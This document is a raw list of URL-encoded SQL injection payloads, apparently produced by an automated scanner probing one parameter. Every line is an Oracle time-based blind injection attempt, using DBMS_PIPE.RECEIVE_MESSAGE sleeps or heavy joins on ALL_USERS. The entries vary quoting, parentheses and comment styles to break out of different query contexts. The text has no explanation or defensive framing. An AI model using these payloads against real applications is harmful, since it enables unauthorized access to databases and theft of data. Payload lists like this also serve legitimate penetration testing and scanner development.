1234.5%27%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%22%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%284594%3D4594 1234.5%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%285484%3D5484 1234.5%29%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%284105%3D4105 1234.5%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%27%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%27KpuQ%27%3D%27KpuQ 1234.5%27%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%27yTnn%27%3D%27yTnn 1234.5%27%29%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%28%27cPIz%27%3D%27cPIz 1234.5%27%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%27pzTA%27%3D%27pzTA 1234.5%27%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%27Yomd%27%20LIKE%20%27Yomd 1234.5%27%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%27phta%27%20LIKE%20%27phta 1234.5%27%29%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%28%27xFpa%27%20LIKE%20%27xFpa 1234.5%27%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%27fgBu%27%20LIKE%20%27fgBu 1234.5%22%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%22Cipn%22%3D%22Cipn 1234.5%22%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%22lbqs%22%3D%22lbqs 1234.5%22%29%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%28%22rmIy%22%3D%22rmIy 1234.5%22%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%22EsNe%22%3D%22EsNe 1234.5%22%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%22cANV%22%20LIKE%20%22cANV 1234.5%22%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%22pQkV%22%20LIKE%20%22pQkV 1234.5%22%29%29%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%28%28%28%22ulNB%22%20LIKE%20%22ulNB 1234.5%22%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20AND%20%22OXNs%22%20LIKE%20%22OXNs 1234.5%29%20WHERE%203748%3D3748%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%27%29%20WHERE%203402%3D3402%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%27%20WHERE%201521%3D1521%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%22%20WHERE%204680%3D4680%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29 1234.5%27%20%7C%7C%20%28SELECT%206979%20FROM%20DUAL%20WHERE%209795%3D9795%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203901%20WHERE%207966%3D7966%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205062%20FROM%20DUAL%20WHERE%203746%3D3746%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20%29 1234.5%20%2B%20%28SELECT%203873%20WHERE%205434%3D5434%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27BBed%27%20FROM%20DUAL%20WHERE%203771%3D3771%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UFvu%27%20WHERE%205283%3D5283%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%209988%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2868%29%7C%7CCHR%28107%29%7C%7CCHR%28121%29%7C%7CCHR%2868%29%2C5%29%20%23 1234.5%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%27%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%27%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%22%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%281283%3D1283 1234.5%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%289725%3D9725 1234.5%29%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%289098%3D9098 1234.5%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%27%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%27Frof%27%3D%27Frof 1234.5%27%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%27EHYa%27%3D%27EHYa 1234.5%27%29%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%28%27qgPK%27%3D%27qgPK 1234.5%27%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%27Eqog%27%3D%27Eqog 1234.5%27%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%27akMz%27%20LIKE%20%27akMz 1234.5%27%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%27EcIL%27%20LIKE%20%27EcIL 1234.5%27%29%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%28%27OYYZ%27%20LIKE%20%27OYYZ 1234.5%27%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%27nVfQ%27%20LIKE%20%27nVfQ 1234.5%22%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%22wIzu%22%3D%22wIzu 1234.5%22%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%22bwAM%22%3D%22bwAM 1234.5%22%29%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%28%22lAAv%22%3D%22lAAv 1234.5%22%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%22PaAx%22%3D%22PaAx 1234.5%22%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%22SSWk%22%20LIKE%20%22SSWk 1234.5%22%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%22JwQi%22%20LIKE%20%22JwQi 1234.5%22%29%29%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%28%28%28%22nYDM%22%20LIKE%20%22nYDM 1234.5%22%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20AND%20%22gqgY%22%20LIKE%20%22gqgY 1234.5%29%20WHERE%206665%3D6665%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%27%29%20WHERE%206729%3D6729%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%27%20WHERE%203987%3D3987%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%22%20WHERE%206505%3D6505%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29-- 1234.5%27%20%7C%7C%20%28SELECT%207957%20FROM%20DUAL%20WHERE%204294%3D4294%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201392%20WHERE%209886%3D9886%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%207609%20FROM%20DUAL%20WHERE%208796%3D8796%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20%29 1234.5%20%2B%20%28SELECT%209999%20WHERE%202884%3D2884%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27pyKB%27%20FROM%20DUAL%20WHERE%203541%3D3541%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27jBgg%27%20WHERE%204785%3D4785%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205328%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28114%29%7C%7CCHR%2871%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%2C5%29--%20%23 1234.5%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%22%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%281600%3D1600 1234.5%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%286279%3D6279 1234.5%29%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%282670%3D2670 1234.5%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27WFzz%27%3D%27WFzz 1234.5%27%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27GVwi%27%3D%27GVwi 1234.5%27%29%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27JCsi%27%3D%27JCsi 1234.5%27%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27JZQt%27%3D%27JZQt 1234.5%27%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%27cLHF%27%20LIKE%20%27cLHF 1234.5%27%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%27YEFm%27%20LIKE%20%27YEFm 1234.5%27%29%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%27CMIE%27%20LIKE%20%27CMIE 1234.5%27%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%27zERf%27%20LIKE%20%27zERf 1234.5%22%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22jdhQ%22%3D%22jdhQ 1234.5%22%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22UyWN%22%3D%22UyWN 1234.5%22%29%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22svZn%22%3D%22svZn 1234.5%22%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22jYLW%22%3D%22jYLW 1234.5%22%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%22dCUJ%22%20LIKE%20%22dCUJ 1234.5%22%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%22ZttZ%22%20LIKE%20%22ZttZ 1234.5%22%29%29%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%28%28%28%22szqx%22%20LIKE%20%22szqx 1234.5%22%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20AND%20%22YIwi%22%20LIKE%20%22YIwi 1234.5%29%20WHERE%209513%3D9513%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%29%20WHERE%205012%3D5012%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%20WHERE%202928%3D2928%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%22%20WHERE%202533%3D2533%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29 1234.5%27%20%7C%7C%20%28SELECT%208118%20FROM%20DUAL%20WHERE%208005%3D8005%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208759%20WHERE%204681%3D4681%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%205336%20FROM%20DUAL%20WHERE%203453%3D3453%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29 1234.5%20%2B%20%28SELECT%206489%20WHERE%201330%3D1330%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27rqwZ%27%20FROM%20DUAL%20WHERE%205632%3D5632%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27KPld%27%20WHERE%202527%3D2527%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%207997%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29%20%23 1234.5%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%22%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%285746%3D5746 1234.5%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%286938%3D6938 1234.5%29%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%286722%3D6722 1234.5%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29-- 1234.5%27%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%27cwZH%27%3D%27cwZH 1234.5%27%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%27DMrl%27%3D%27DMrl 1234.5%27%29%29%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%28%28%27NZrk%27%3D%27NZrk 1234.5%27%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%27gYGz%27%3D%27gYGz 1234.5%27%29%20AND%209788%3D%28SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%29--%20AND%20%28%27bDug%27%20LIKE%20%27bDug 